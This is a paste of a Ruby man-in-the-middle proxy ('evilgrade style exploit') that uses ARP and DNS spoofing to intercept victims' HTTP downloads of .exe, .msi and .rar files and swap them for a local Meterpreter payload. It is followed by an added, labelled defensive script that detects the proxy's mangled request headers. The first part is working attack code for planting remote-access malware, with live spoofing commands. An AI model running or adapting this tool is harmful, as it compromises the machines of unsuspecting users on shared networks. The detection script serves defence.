evilgrade style exploit. . . by bigmac

By: a guest on Oct 11th, 2012  |  syntax: Ruby  |  size: 4.38 KB  |  views: 347  |  expires: Never
#sudo ruby proxy.rb port
#sudo ruby proxy.rb 666
#sudo is needed for opening a socket
require 'eventmachine' #must install eventmachine
prox_port=ARGV[0]
attacker_ip="192.168.0.2" #local host
meterpreter="/tmp/meterpreter" # search this script and replace /home/bigmac/tmp/meterpreter
#meterpreter.EXE meterpreter.MSI meterpreter.RAR meterpreter.ZIP
#if the meterpreter exists with the file extension the client is attempting to download then the switch will be made

dns = File.open("dns.conf", "w+")   # set up for dns spoofing domains to this proxy
dns.write("#{attacker_ip}        *.*")# this is your ip,
dns.close


#      uncomment these lines when you want to use arpspoof/dnsspoof
#victim="192.168.1.111"
#gateway="192.168.1.1"
#`pkill spoof`
#a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
#c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
#b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns.conf'"}
#a.run
#b.run
#c.run
Thread.start{
class Client < EM::Connection
        def initialize(other, finger, *args, &blk)
                @other, @finger = other, finger
                super(*args, &blk)
        end


        def post_init
                @payload_extension=""
                send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") #send a get request, but disable gzip encoding
                for x in [".exe",".rar",".msi"]# payload format list, checking for file extension... add more of these to the list
                        extension_check=@finger.scan(/#{x}/).to_s
                        if extension_check.length>1
                                @payload_extension<<extension_check
                        end
                end
                if @payload_extension.length==0
                        @payload_extension=""
                end
        end

#Content-Type: application/x-msdos-program
#Content-Type: application/x-msdownload
#Content-Type: application/octet-stream
#Content-Type: application/x-msihttp://www.i8igmac.tk/file.exe
#Content-Type: application/x-rar
#Content-Type: application/octet-stream
#a list of possible application downloads... maybe check the GET request for jar? exe? msi? rar?

        def receive_data(response)  # this is the part that the web client will see... change with evil code
                clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","")
                if response.scan("Content-Length: ").to_s == "Content-Length: " # if true

                        if @payload_extension.length>1 # if true
                                for trigger in ["application/x-msdos-program","application/x-msdownload","application/octet-stream","application/x-msi","applictation/x-rar","application/rar","application/octet-stream"] # add more triggers to this list
                                        if response.scan("#{trigger}").to_s.length>1 # if string is found, trigger

                                                if File.exists?("/tmp/meterpreter#{@payload_extension.downcase}")#= true
                                                        puts " injecting #{@payload_extension} SUCCESS"#we need to check if the payload exists and use this extension
                                                        payload=File.read("/tmp/meterpreter#{@payload_extension.downcase}")#if the payload does not exist then this will break the script
                                                        headers,body = response.split("\r\n\r\n", 2)
                                                        @other.send_data headers.gsub(clength,payload.length.to_s)+"\r\n\r\n"+payload
                                                else
                                                        puts "payload does not exist? meterpreter#{@payload_extension} sending unmodified data"
                                                end

                                        end
                                end #end of the trigger loop
                        end#end of if payload_extension.length

                end
                @other.send_data response
                #if no injection was made, pass the unmodified response on to the web browser
        end



end
      #browser open to http://192.168.1.114
      module EchoServer
        def receive_data(finger) #finger is the header received from the client, could log these cookies or log these pages
                ping = finger.gsub(" ","").index("Host:")
                pong = finger.gsub(" ","").index("\n",ping)
                host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp #old method for gathering the host: field... could shorten this
                #I don't know if this will prevent loading from cache
                data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:")
                EventMachine::connect host, 80, Client, self, data # ask google for response...
        end
end
}
      EventMachine::run {
        EventMachine::start_server attacker_ip, prox_port, EchoServer
      }        #             YOUR IP
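A detection-side companion, added here as an example and not part of bigmac's paste: the proxy above rewrites "Accept-Encoding:" to "Assept-Ensoding:" and "If-None-Match:"/"If-Modified-Since:" to "If-None-MutXX:"/"If-Modified-SXnce:" so the origin server ignores them. Those near-miss header names survive in the request the server or an IDS sees, so a check that flags unknown header names within a few edits of a standard one catches this proxy and, more generally, any tamperer that disables caching or compression the same way. The standard-header list, the edit-distance threshold and the two sample requests below are my own constructed assumptions.

```ruby
# Added example (not from the original paste): flag HTTP request headers whose
# names are near-misses of standard ones, as produced by a header-mangling
# proxy. Standard-header list and threshold are assumptions for this demo.

STANDARD_HEADERS = %w[
  Host User-Agent Accept Accept-Encoding Accept-Language Connection
  If-None-Match If-Modified-Since Cache-Control Referer Cookie Range
].freeze

# Levenshtein edit distance, case-insensitive.
def edit_distance(a, b)
  a = a.downcase
  b = b.downcase
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cost = ca == cb ? 0 : 1
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost].min
    end
    prev = cur
  end
  prev[b.length]
end

# Parse the header block of a raw HTTP/1.x request into [[name, value], ...].
def parse_headers(raw)
  head = raw.split("\r\n\r\n", 2).first
  head.split("\r\n").drop(1).filter_map do |line|
    name, value = line.split(":", 2)
    next if value.nil?
    [name.strip, value.strip]
  end
end

# Unknown header names within roughly a quarter of a standard name's length
# in edits (at least 1) are reported as [mangled_name, nearest_standard_name].
# The relative threshold keeps short legitimate custom headers (e.g. DNT)
# from being matched against short standard ones (e.g. Host).
def suspicious_headers(raw)
  parse_headers(raw).filter_map do |name, _|
    next if STANDARD_HEADERS.any? { |h| h.casecmp?(name) }
    near = STANDARD_HEADERS.find { |h| edit_distance(h, name) <= [1, h.length / 4].max }
    [name, near] if near
  end
end

# Constructed sample requests: one clean, one as rewritten by the proxy above.
CLEAN_REQUEST = "GET /setup.exe HTTP/1.1\r\nHost: example.test\r\n" \
                "Accept-Encoding: gzip\r\nIf-None-Match: \"abc\"\r\n\r\n"
MANGLED_REQUEST = "GET /setup.exe HTTP/1.1\r\nHost: example.test\r\n" \
                  "Assept-Ensoding: gzip\r\nIf-None-MutXX: \"abc\"\r\n" \
                  "If-Modified-SXnce: Thu, 11 Oct 2012 00:00:00 GMT\r\n\r\n"

if __FILE__ == $0
  [CLEAN_REQUEST, MANGLED_REQUEST].each do |req|
    hits = suspicious_headers(req)
    puts hits.empty? ? "clean" : "ALERT: " + hits.map { |n, h| "#{n} (~#{h})" }.join(", ")
  end
end
```

Run it directly to see the clean request pass and the mangled one raise an alert for all three rewritten headers; in a real deployment the same check would be fed from the web server's request log or an inline proxy, and a hit is a strong sign that a client's traffic passed through a rewriting middlebox.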